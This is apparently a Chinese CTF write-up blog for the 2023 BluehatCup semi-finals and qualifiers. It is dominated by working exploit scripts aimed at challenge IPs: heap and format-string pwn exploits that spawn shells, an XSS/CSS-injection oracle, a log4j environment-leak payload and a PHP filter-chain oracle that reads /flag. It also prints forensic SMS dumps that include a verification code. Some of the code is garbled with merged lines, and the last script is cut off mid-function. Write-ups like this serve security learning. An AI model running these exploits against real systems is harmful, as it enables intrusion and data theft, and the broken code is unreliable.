         s[i] = i;
     }
    for (i = 0; i < 256; i++) {
         j = (j + s[i] + key[i % key_length]) % 256;
         t = s[i];
         s[i] = s[j];
         s[j] = t;
     }
    i = j = 0;
     for (int k = 0; k < data_length; k++) {
         i = (i + 1) % 256;
         j = (j + s[i]) % 256;
         t = s[i];
         s[i] = s[j];
         s[j] = t;
         data[k] ^= s[(s[i] + s[j]) % 256];
     }
 }
 int main()
 {
     int clientSocket = socket(AF_INET, SOCK_STREAM, 0);
     if (clientSocket == -1) {
         printf("socket failed!\n");
         return 1;
     }
     struct sockaddr_in serverAddr;
     serverAddr.sin_family = AF_INET;
     serverAddr.sin_port = htons(SERVER_PORT);
     serverAddr.sin_addr.s_addr = inet_addr(SERVER_IP);
     connect(clientSocket, (struct sockaddr)&serverAddr, sizeof(serverAddr));
     int result = recv(clientSocket, buff, sizeof(buff), 0);
     int a=0;
     char q[10];
     unsigned char key[]="do_not_care";
     unsigned char key2[] = "where_is_the_key";
     FILE file = fopen("have_your_fun.jocker", "wb");
     if (file == NULL) {
         printf("open file failed!\n");
         return 1;
     }
     unsigned char *str;
     str = (char *) malloc(20000);
     memcpy(str, buff, 20000);
 rc4_encrypt_decrypt(key2, str, 20000);
     printf("please give me the key of fun:");
     scanf("%s",q);
     rc4_encrypt_decrypt(key, str, 20000);
    fwrite(buff, 1, 20000, file);
     printf("maybe you go wrong");
     fclose(file);
     close(clientSocket);
     return 0;
 }

就是两次RC4加密,并且给了密钥:do_not_care& where_is_the_key

虽然没有加密文件,但是根据PNG,我们用文件头 89504E47​ 来推出相应加密文件头

应该要以文件尾推出结果结束,但是没搜到,好在文件上下位置比较明显:

2023 BluehatCup Semi-Finals WriteUp by 圣地亚哥皮蛋

被队友带飞了,本来一直是总榜第一,后来吉林大学的师傅们TQL,最后5min出了PWN侧信道成功反超我们,后面再加上取证我们也只能屈居分区第二(总榜第二)了呜呜呜~不过,好歹算是“有惊无险”进入决赛了,师傅们北京见!

Web

AirticleShare

原题,唯一的改动是把 show.php 改成了 lookup.php,不过题目环境不太好,一直把 sleep 改大 改到 6 才能顺利跑通

import requests
import time

s = requests.Session()

base_url = "http://112.74.185.213:46791/"

res = s.get(base_url)

pos = res.text.find('name="c" value="') + len('name="c" value="')
csrftoken = res.text[pos:pos+16]

ss = "1234567890abcdef"
flag = ""

for i in range(16):
    for j in ss:
        payload = f"<form data-parsley-validate><input data-parsley-required data-parsley-trigger=\"blur\" data-parsley-error-message='<input type=\"input\" id=like value=\"rebirth_is_really_nb\">' data-parsley-errors-container=\"a[href^='/lookup.php?id={flag + j}']\" autofocus></form>"
        data = {'c': csrftoken, 'content': payload}
        res = s.post(base_url + "add.php", data=data, allow_redirects=False)
        # print(res.headers)
        location = res.headers['Location']
        pos = location.find('id=') + 3
        wp = location[pos:]
        data = {'c': csrftoken, 'id': wp}
        res = s.post(base_url + "admin.php", data=data)
        time.sleep(6)

        res = s.get(f"http://112.74.185.213:46791/lookup.php?id={wp}")
        # print(res.text)
        txt = res.text.replace("\n", "").replace("\r", "")
        if "Liked by</h3>admin" not in txt:
            flag += j
            print(i,flag)
            break

然后带着这个 id 去访问

参考文章: https://blog.zeddyu.info/2020/01/08/36c3-web/#writeupbin

MyLinuxBot

根据代码和提示可以简单猜测和 log4j 相关的题目,但是这里没有给出 jar 包源码,说这个不关键

上网随手一搜搜出来了原题 GoogleCTF2022-Log4j

这里这道题只是对 python 代码做了简单的混淆,按照 https://y4tacker.github.io/2022/07/06/year/2022/7/GoogleCTF2022-Log4j/,直接打里面的非预期就能通

${bundle:${env:FLAG}}

pwn

Uaf

直接l用ubin可以leak,然后利用admin中的哪个任意地址写打exit_hook就行了

其实不至于这么麻烦的emmmm,然后发现只用里面的哪个格式化字符串就可以单独完成这个漏洞的利用:

#encoding = utf-8
import os
import sys
from pwn import *

context.os = 'linux'
context.arch = 'amd64'
context.log_level = "debug"

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

p = remote('120.78.209.16',40894)
#p = process('./main')
elf = ELF('./main')
libc = ELF('./libc-2.31.so')

def debug():
        gdb.attach(p)
        pause()

def choice(cho):
        sla('>> \n',cho)

def login():
        choice(5)
        sa('Passwd: \n','1234567890')

def pwn():
        login()
        #debug()
        sla("Tell me ur name: \n",'%19$p')
        ru('0x')
        libcbase = int(r(12),16) - 0x7fc55edc1083 + 0x7fc55ed9d000
        leak('libcbase',libcbase)
        exithook = libcbase + 0x222060 + 3848
        og = libcbase + 0xe6c7e
        sla('>> \n','2')
        p.sendafter('WRITE MODE: \n',p64(exithook))
        sleep(1)
        p.send(p64(og))
        itr()

if __name__ == '__main__':
        pwn()

'''
0xe6c7e execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe6c81 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe6c84 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL

'''

Admin

出题人万岁,退役之前还能拿个一血开心

非预期,就是过滤了flag但是没过滤f*就出了

cat f*

Crypto

ezrsa

等式前边通分、分子等分子、分母等分母

解方程

from Crypto.Util.number import *
from gmpy2 import *
import sympy
n = 161010103536746712075112156042553283066813155993777943981946663919051986586388748662616958741697621238654724628406094469789970509959159343108847331259823125490271091357244742345403096394500947202321339572876147277506789731024810289354756781901338337411136794489136638411531539112369520980466458615878975406339
c = 15380535750650959213679345560658190067564859611922563753882617419201718847747207949211621591882732604480600745000879508274349808435529637573773711729853565120321608048340424321537282281161623712479117497156437792084977778826238039385697230676340978078264209760724043776058017336241110097549146883806481148999
X = 153801856029563198525204130558738800846256680799373350925981555360388985602786501362501554433635610131437376183630577217917787342621398264625389914280509
Y = 8086061902465799210233863613232941060876437002894022994953293934963170056653232109405937694010696299303888742108631749969054117542816358078039478109426

p = sympy.Symbol('p')
q = sympy.Symbol('q')
f1 = p - q + 1 - (-X - 2 * Y)
f2 = p * q - n
result = sympy.solve([f1,f2],[p,q])
print(result)
p = 12774247264858490260286489817359549241755117653791190036750069541210299769639605520977166141575653832360695781409025914510310324035255606840902393222949771
q = 12604273285023995463340817959574344558787108098986028639834181397979984443923512555395852711753996829630650627741178073792454428457548575860120924352450409
phi = (p - 1) * (q - 1)
e = 0x10001
d = invert(e,phi)
m = pow(c,d,n)
print(long_to_bytes(m))

Re

justamat

一开始给v0赋值 there_are_a_lot_useless_information_but_oh.o0O_

然后是输出和读入的过程

这里v14就是输入的长度,根据长度选择流程,这里应该是大于15的

这里进行字符串拼接,动调发现就是str1+input+str2

然后用do...while写了一个遍历,把str1+input+str2​存入v5,也就是后面的v16

然后进这个函数中

双字节提取出来

这个do..while循环就是主要逻辑

这里直接 用z3求解

from z3 import*
s=Solver()
flag = [Int("flag%d" % i) for i in range(100)]
a = [0x0001C633, 0x0001DF94, 0x00020EBF, 0x0002BA40, 0x0001E884, 0x000260D1, 0x0001F9B1, 0x0001EA1A, 0x0001EEAA, 0x0001DFB2, 0x0001C1D0, 0x0001EEF2, 0x000216E1, 0x0002BE00, 0x0001FB5E, 0x00025D74, 0x0001F000, 0x000202D6, 0x00020002, 0x0001DDFE, 0x0001C017, 0x0001F08C, 0x000227F6, 0x0002C7BA, 0x000201AE, 0x00027FBF, 0x00020E21, 0x0001FF5C, 0x0001FD62, 0x0001E948, 0x0001BE6E, 0x0001F4D7, 0x00022C8D, 0x0002C353, 0x0001F8DB, 0x00026E1D, 0x0001FF61, 0x0001EA0F, 0x0001F0D6, 0x0001EDA8, 0x0001AD7D, 0x00018218, 0x0001CCD4, 0x000239B6, 0x0001AC4C, 0x00020D7C, 0x0001D967, 0x0001A4F4, 0x0001CAD8, 0x000196AE, 0x0001831B, 0x00017E45, 0x0001D0CF, 0x00023EDF, 0x000181AE, 0x00021760, 0x0001D3B4, 0x000175D6, 0x00017D3A, 0x0001994F, 0x0001189D, 0x00014CCF, 0x0001568E, 0x00017EEB, 0x0001327E, 0x00016A45, 0x00012921, 0x00011FF0, 0x00013643, 0x00011729, 0x00015191, 0x00017D17, 0x00017262, 0x0001A863, 0x00017010, 0x00017B10, 0x00014F9C, 0x000143E8, 0x00015E9B, 0x0001242C, 0x0000F68C, 0x0001192A, 0x000150AD, 0x0001B1A0, 0x00014C60, 0x000182AB, 0x00013F4B, 0x000141A6, 0x00015AA3, 0x000135C9, 0x0001D86F, 0x0001E8FA, 0x0002158D, 0x0002BDAC, 0x00020E4F, 0x00027EE6, 0x000213B9, 0x00020E86, 0x000211FF, 0x0001E1EF]
b = [0x000000FE, 0x0000000B, 0x0000001D, 0x000000F6, 0x00000083, 0x000000FF, 0x000000E0, 0x000000B8, 0x000000DD, 0x000000B0, 0x000000C5, 0x000000DE, 0x000000F6, 0x00000014, 0x0000009F, 0x000000DD, 0x000000D9, 0x00000007, 0x0000002D, 0x0000006B, 0x00000019, 0x000000CA, 0x00000073, 0x000000FD, 0x00000087, 0x00000072, 0x00000024, 0x00000004, 0x00000049, 0x0000007E, 0x000000A9, 0x000000CE, 0x00000091, 0x000000BE, 0x00000041, 0x00000018, 0x00000060, 0x0000003F, 0x0000002B, 0x00000063, 0x0000001C, 0x000000D2, 0x00000090, 0x000000E9, 0x0000008E, 0x000000BA, 0x0000001E, 0x000000F3, 0x00000041, 0x000000AD, 0x0000002C, 0x00000003, 0x00000069, 0x000000DA, 0x00000010, 0x000000FD, 0x000000FD, 0x000000E7, 0x00000006, 0x00000036, 0x000000D6, 0x00000002, 0x00000059, 0x00000018, 0x000000CC, 0x00000050, 0x00000087, 0x000000AF, 0x000000FB, 0x00000018, 0x00000044, 0x0000007F, 0x000000AD, 0x000000F8, 0x0000002C, 0x00000067, 0x0000001D, 0x00000022, 0x00000084, 0x000000AC, 0x0000000E, 0x00000023, 0x000000DC, 0x000000E6, 0x000000BB, 0x000000D2, 0x000000B8, 0x0000004A, 0x000000BC, 0x000000DE, 0x00000050, 0x0000009C, 0x0000001C, 0x0000001E, 0x00000086, 0x0000003A, 0x0000002D, 0x000000DD, 0x000000C3, 0x00000003]

print(len(a))
for j in range(10):
    for k in range(10):
        i = k
        v8 = 0
        for m in range(10):
            v9 = flag[j*10+m] * b[i+m*10]
            #i += 10
            v8 += v9
        s.add(v8==a[k+j*10])

if s.check() == sat:
    m = s.model()
    for f in flag:
        print(chr(m[f].as_long()),end='')

Misc

签到

排队队吃果果

每一列excel按照数值升序排序,然后粗的是1,可以用Excel条件格式批量实现:

重新设置一下宽高就好了:

flag{35b6f3ed-9d28-93b8-e124-39f8ec3376b2}

取证

1、

看字面意思应该是任务开始的时候

2、

3、

4、

手机取证软件直接就有

5、

取证软件里面就有

6、

​​c727420a290df2250001612e4d5c1b0​​

7、

火眼出

8、

​​6ada8fd70d0b2788fea737d8e2dcb27​​

9、

同上题图

10、

11、

12、

在sd卡里面找到找到calllog.txt用base64解密,就看到了通话记录

发现有两次

13、

两次,一次AES,一次base64

14、

找到了一个getkey的函数

里面对字符串lijubdyhfurindhcbxdw

根据函数特征猜测应该是base64加密后取前16位

bGlqdWJkeWhmdXJp

找到sms.txt解密发现有效

package script;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import java.util.Base64;
import javax.crypto.Cipher;

public class aes_dec {
    public static void decrypt() {
        try {
            String key= "bGlqdWJkeWhmdXJp";
            String enc = "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";
            byte[] enc_b64decode = Base64.getDecoder().decode(enc);
            SecretKeySpec key_init = new SecretKeySpec(key.getBytes("utf-8"), "AES");
            Cipher decode = Cipher.getInstance("AES/ECB/NoPadding");
            decode.init(Cipher.DECRYPT_MODE,key_init);
            byte[] enc_aesdecode = decode.doFinal(enc_b64decode);
            String flag = new String(enc_aesdecode, "utf-8");
            System.out.println(flag);
        }
        catch(Exception v5_1) {
            v5_1.printStackTrace();
        }
    }
}

15、

【探探应用】碧波,有人追你!她20岁,离你553米,建议匹配后和她聊聊成都的话题。l.tantanapp.com/app 回T退订, Date: Tue Aug 17 17:51:02 GMT+08:00 2021
Address: 106931164284, Body: 【百合网】有人多次给你留言没有得到你的回复呢,点击查看 http://j.qiuai.com/21VCHMdSTAS; 回T退订, Date: Tue Aug 17 17:31:23 GMT+08:00 2021
Address: 10658678, Body: 四川手机报:你和妻子/丈夫最难沟通的事是什么?“3.8国际妇女节”到来之际,四川手机报发起话题征集:作为妻子,日常生活中哪种情形让你觉得和丈夫很难沟通?作为丈夫,妻子的哪些话让你不明所以?跟帖留言 mala.cn/t/16104287?s=fOJt81F, Date: Mon Mar 01 09:50:52 GMT+08:00 2021
Address: 106948500153, Body: 【借呗】你支付宝120***@qq.com借呗今天将从余额、储蓄卡或余额宝自动还款1021.68元。如已还款,请忽略, Date: Mon Mar 01 09:26:44 GMT+08:00 2021
Address: 10086, Body: 【缴费提醒】尊敬的客户,您好!您于2021年03月01日09时10分,使用统一支付充值服务为本机充值100.00元,当前余额为124.21元。为避免影响您上网功能的正常使用,请进行关开机或关开飞行模式操作,谢谢。如需查看更多业务使用情况,请登录【四川移动掌上营业厅】,点击下载体验http://dx.10086.cn/schfcd 。百分努力,只为您10分满意!【中国移动】, Date: Mon Mar 01 09:09:49 GMT+08:00 2021
Address: 106980095188, Body: 【支付宝】你正在登录支付宝,验证码9250,泄露验证码会影响资金安全。唯一热线:95188, Date: Mon Mar 01 09:08:43 GMT+08:00 2021

2023 BluehatCup CTF partly WriteUp by 圣地亚哥皮蛋 | QUALS

这次CTF部分打的可以,抢了一个Misc二血。但是取证拉了。。。呜呜呜,要好好学取证了捏

PWN

takeway

就可以随意地址申请堆块,先改最大堆块数,然后在elf地址上泄露一个stdout,之后就打free_hook就行了,版本是2.31_9.9

#encoding = utf-8
import os
import sys
import time
from pwn import *
from ctypes import *
#from LibcSearcher import * 

context.os = 'linux'
context.log_level = "debug"

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

add_idx = 1
delete_idx = 2
edit_idx = 3
context.arch = 'amd64'
p = remote('101.200.234.115',46498)
#p = process('./takeway')
elf = ELF('./takeway')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')

def debug():
        gdb.attach(p)
        pause()

def choice(cho):
        sla('Please input your choose: ',cho)

def add(idx,name,content):
        choice(add_idx)
        sla('Please input your order index\n',idx)
        sla('Please input your food name: ',name)
        sla('a remark: ',content)

def delete(idx):
        choice(delete_idx)
        sla('Please input your order index: ',idx)

def edit(idx,content):
        choice(edit_idx)
        sla('Please input index: ',idx)
        p.sendlineafter('New food name is: ',content)

def add1(idx,name,content):
        choice(add_idx)
        sla('Please input your order index\n',idx)
        p.sendlineafter('Please input your food name: ',name)
        p.sendlineafter('a remark: ',content)

def pwn():
        add(0,'banana','xj')
        add(1,'banana','xj')
        delete(0)
        delete(1)
        edit(1,p64(0x0404080))
        add(2,'banana','xj')
        add(3,'bananaa','fffffff')
        choice(edit_idx)
        sla('Please input index: ',3)
        ru('fff\n')
        out = uu64(r(6))
        leak('stdout',out)
        p.sendlineafter('New food name is: ','cat')
        libcbase = out-(0x7f881942f6a0 - 0x7f8819242000)
        leak('libcbase',libcbase)
        delete(0)
        delete(1)
        edit(1,p64(libcbase + libc.sym['__free_hook']))
        add(4,'cat','cat')
        choice(add_idx)
        sla('Please input your order index\n',7)
        p.sendafter('Please input your food name: ',p64(libcbase+libc.sym['system']))
        p.sendlineafter('a remark: ','aa')
        leak('free',libcbase + libc.sym['__free_hook'])
        edit(1,'/bin/sh')
        #debug()
        delete(1)
        #debug()
        itr()

if __name__ == '__main__':
        pwn()

'''
0xe3afe execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
'''

WEB

Lovephp

第一个 tricks https://bugs.php.net/bug.php?id=81151

第二个 tricks 是这里的这个参数怎么传入,在 ctfshow 中也有过相应题目,看到 main/php_variables.c#L105-L115:

/* ensure that we don't have spaces or dots in the variable name (not binary safe) */
for (p = var; *p; p++) {
    if (*p == ' ' || *p == '.') {
        *p='_';
    } else if (*p == '[') {
        is_array = 1;
        ip = p;
        *p = 0;
        break;
    }
}

为了某些特殊的需要,我们发现 PHP 会将 空格、. 转化为下划线,但是如果这里有 [ 的话会直接 break 掉,然后在 is_array==1 的时候会调用如下内容

main/php_variables.c#L191-L195

if (!ip) {
    /* PHP variables cannot contain '[' in their names, so we replace the character with a '_' */
    *(index_s - 1) = '_';

    index_len = 0;

这里我们的 [ 会被替换为 _ 但是后续却没有再继续进行 . 和 空格 的检测,最终构造 paylaod 如下:my[secret.flag=C:8:"Saferman":0:{}

然后就是 file() 函数的利用,参考 https://github.com/DownUnderCTF/Challenges_2022_Public/blob/main/web/minimal-php/solve/solution.py

http://tttang.com/archive/1395/#toc_craft-base64-payload

这里是一个 PHP Devlopment Sever,重新用脚本 fuzz 一下,直接读 /flag

import requests
import sys
from base64 import b64decode

"""
THE GRAND IDEA:
We can use PHP memory limit as an error oracle. Repeatedly applying the convert.iconv.L1.UCS-4LE
filter will blow up the string length by 4x every time it is used, which will quickly cause
500 error if and only if the string is non empty. So we now have an oracle that tells us if
the string is empty.

THE GRAND IDEA 2:
The dechunk filter is interesting.
https://github.com/php/php-src/blob/01b3fc03c30c6cb85038250bb5640be3a09c6a32/ext/standard/filters.c#L1724
It looks like it was implemented for something http related, but for our purposes, the interesting
behavior is that if the string contains no newlines, it will wipe the entire string if and only if
the string starts with A-Fa-f0-9, otherwise it will leave it untouched. This works perfect with our
above oracle! In fact we can verify that since the flag starts with D that the filter chain

dechunk|convert.iconv.L1.UCS-4LE|convert.iconv.L1.UCS-4LE|[...]|convert.iconv.L1.UCS-4LE

does not cause a 500 error.

THE REST:
So now we can verify if the first character is in A-Fa-f0-9. The rest of the challenge is a descent
into madness trying to figure out ways to:
- somehow get other characters not at the start of the flag file to the front
- detect more precisely which character is at the front
"""

def join(*x):
        return '|'.join(x)

def err(s):
        print(s)
        raise ValueError

def req(s):
        params = {
                'secret': f'php://filter/{s}/resource=/flag',
                "my[secret.flag":'C:8:"Saferman":0:{}'
        }
        return requests.post('http://39.105.5.7:45123/index.php', params=params).status_code == 500"""
Step 1:
The second step of our exploit only works under two conditions:
- String only contains a-zA-Z0-9
- String ends with two equals signs

base64-encoding the flag file twice takes care of the first condition.

We don't know the length of the flag file, so we can't be sure that it will end with two equals
signs.

Repeated application of the convert.quoted-printable-encode will only consume additional
memory if the base64 ends with equals signs, so that's what we are going to use as an oracle here.
If the double-base64 does not end with two equals signs, we will add junk data to the start of the
flag with convert.iconv..CSISO2022KR until it does.
"""

blow_up_enc = join(*['convert.quoted-printable-encode']*1000)
blow_up_utf32 = 'convert.iconv.L1.UCS-4LE'
blow_up_inf = join(*[blow_up_utf32]*50)

header = 'convert.base64-encode|convert.base64-encode'# Start get baseline blowupprint('Calculating blowup')
baseline_blowup = 0for n in range(100):
        payload = join(*[blow_up_utf32]*n)
        if req(f'{header}|{payload}'):
                baseline_blowup = n
                breakelse:
        err('something wrong')

print(f'baseline blowup is {baseline_blowup}')

trailer = join(*[blow_up_utf32]*(baseline_blowup-1))

assert req(f'{header}|{trailer}') == False

print('detecting equals')
j = [
        req(f'convert.base64-encode|convert.base64-encode|{blow_up_enc}|{trailer}'),
        req(f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.base64-encode{blow_up_enc}|{trailer}'),
        req(f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.iconv..CSISO2022KR|convert.base64-encode|{blow_up_enc}|{trailer}')
]
print(j)
if sum(j) != 2:
        err('something wrong')
if j[0] == False:
        header = f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.base64-encode'
elif j[1] == False:
        header = f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.iconv..CSISO2022KRconvert.base64-encode'
elif j[2] == False:
        header = f'convert.base64-encode|convert.base64-encode'else:
        err('something wrong')
print(f'j: {j}')
print(f'header: {header}')

"""
Step two:
Now we have something of the form
[a-zA-Z0-9 things]==

Here the pain begins. For a long time I was trying to find something that would allow me to strip
successive characters from the start of the string to access every character. Maybe something like
that exists but I couldn't find it. However, if you play around with filter combinations you notice
there are filters that *swap* characters:

convert.iconv.CSUNICODE.UCS-2BE, which I call r2, flips every pair of characters in a string:
abcdefgh -> badcfehg

convert.iconv.UCS-4LE.10646-1:1993, which I call r4, reverses every chunk of four characters:
abcdefgh -> dcbahgfe

This allows us to access the first four characters of the string. Can we do better? It turns out
YES, we can! Turns out that convert.iconv.CSUNICODE.CSUNICODE appends <0xff><0xfe> to the start of
the string:

abcdefgh -> <0xff><0xfe>abcdefgh

The idea being that if we now use the r4 gadget, we get something like:
ba<0xfe><0xff>fedc

And then if we apply a convert.base64-decode|convert.base64-encode, it removes the invalid
<0xfe><0xff> to get:
bafedc

And then apply the r4 again, we have swapped the f and e to the front, which were the 5th and 6th
characters of the string. There's only one problem: our r4 gadget requires that the string length
is a multiple of 4. The original base64 string will be a multiple of four by definition, so when
we apply convert.iconv.CSUNICODE.CSUNICODE it will be two more than a multiple of four, which is no
good for our r4 gadget. This is where the double equals we required in step 1 comes in! Because it
turns out, if we apply the filter
convert.quoted-printable-encode|convert.quoted-printable-encode|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7

It will turn the == into:
+---AD0-3D3D+---AD0-3D3D

And this is magic, because this corrects such that when we apply the
convert.iconv.CSUNICODE.CSUNICODE filter the resuting string is exactly a multiple of four!

Let's recap. We have a string like:
abcdefghij==

Apply the convert.quoted-printable-encode + convert.iconv.L1.utf7:
abcdefghij+---AD0-3D3D+---AD0-3D3D

Apply convert.iconv.CSUNICODE.CSUNICODE:
<0xff><0xfe>abcdefghij+---AD0-3D3D+---AD0-3D3D

Apply r4 gadget:
ba<0xfe><0xff>fedcjihg---+-0DAD3D3---+-0DAD3D3

Apply base64-decode | base64-encode, so the '-' and high bytes will disappear:
bafedcjihg+0DAD3D3+0DAD3Dw==

Then apply r4 once more:
efabijcd0+gh3DAD0+3D3DAD==wD

And here's the cute part: not only have we now accessed the 5th and 6th chars of the string, but
the string still has two equals signs in it, so we can reapply the technique as many times as we
want, to access all the characters in the string ;)
"""

flip = "convert.quoted-printable-encode|convert.quoted-printable-encode|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.CSUNICODE.CSUNICODE|convert.iconv.UCS-4LE.10646-1:1993|convert.base64-decode|convert.base64-encode"
r2 = "convert.iconv.CSUNICODE.UCS-2BE"
r4 = "convert.iconv.UCS-4LE.10646-1:1993"

def get_nth(n):
        global flip, r2, r4
        o = []
        chunk = n // 2if chunk % 2 == 1: o.append(r4)
        o.extend([flip, r4] * (chunk // 2))
        if (n % 2 == 1) ^ (chunk % 2 == 1): o.append(r2)
        return join(*o)

"""
Step 3:
This is the longest but actually easiest part. We can use dechunk oracle to figure out if the first
char is 0-9A-Fa-f. So it's just a matter of finding filters which translate to or from those
chars. rot13 and string lower are helpful. There are probably a million ways to do this bit but
I just bruteforced every combination of iconv filters to find these.

Numbers are a bit trickier because iconv doesn't tend to touch them.
In the CTF you coud porbably just guess from there once you have the letters. But if you actually 
want a full leak you can base64 encode a third time and use the first two letters of the resulting
string to figure out which number it is.
"""

rot1 = 'convert.iconv.437.CP930'
be = 'convert.quoted-printable-encode|convert.iconv..UTF7|convert.base64-decode|convert.base64-encode'
o = ''

def find_letter(prefix):
        if not req(f'{prefix}|dechunk|{blow_up_inf}'):
                # a-f A-F 0-9if not req(f'{prefix}|{rot1}|dechunk|{blow_up_inf}'):
                        # a-efor n in range(5):
                                if req(f'{prefix}|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):
                                        return 'edcba'[n]
                                        breakelse:
                                err('something wrong')
                elif not req(f'{prefix}|string.tolower|{rot1}|dechunk|{blow_up_inf}'):
                        # A-Efor n in range(5):
                                if req(f'{prefix}|string.tolower|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):
                                        return 'EDCBA'[n]
                                        breakelse:
                                err('something wrong')
